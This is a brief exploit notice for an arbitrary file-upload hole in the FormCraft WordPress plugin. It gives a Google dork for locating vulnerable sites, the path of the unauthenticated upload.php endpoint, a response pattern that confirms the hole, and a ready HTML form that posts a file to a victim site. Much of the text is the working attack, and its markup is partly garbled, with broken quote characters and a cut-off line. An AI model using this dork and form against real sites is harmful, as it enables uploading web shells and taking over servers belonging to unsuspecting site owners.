#- Author: -
#- Date: -
#- Developer : AndonDesign
#- Link Download : wordpress .org/plugins/formcraft-form-builder
#- Google Dork: inurl:"/plugins/formcraft/"
#- Fixed in Version : -
#- Tested on : win
=======================================================
-- Proof Of Concept --
Vulnerable : /wp-content/plugins/formcraft/file-upload/server/php/upload.php
When Vuln : {"files":
CSRF :
<form method=�POST� action=�http://victim. com/wp-content/plugins/formcraft/file-upload/server/php/upload.php�enctype=�multipart/form-data�><input type=�file� name=�files[]� /><button>Upload</button></form>